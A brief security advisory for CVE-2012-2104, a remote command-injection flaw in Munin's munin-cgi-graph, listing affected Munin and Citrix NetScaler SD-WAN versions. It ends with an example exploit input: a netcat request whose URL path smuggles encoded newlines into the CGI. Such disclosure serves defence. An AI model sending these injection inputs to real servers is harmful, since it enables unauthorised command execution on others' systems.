Munin Remote Command Injection Vulnerability

Munin is prone to a remote command-injection vulnerability.

Attackers can exploit this issue to inject and execute arbitrary commands in the context of the application.


Bugtraq ID: 53032
Class: Input Validation Error
CVE: CVE-2012-2104

Remote: Yes
Local: No
Published: Apr 13 2012 12:00AM
Updated: Oct 24 2018 07:00AM
Credit: Helmut Grohne
Vulnerable: Munin Munin 2.0~rc4-1
Citrix NetScaler SD-WAN 10.1.1
Citrix NetScaler SD-WAN 10.0.4
Citrix NetScaler SD-WAN 9.3.6

Not Vulnerable:


The following example input is available:

printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost: localhost\r\nConnection: close\r\n\r\n' | nc localhost 80

Related Posts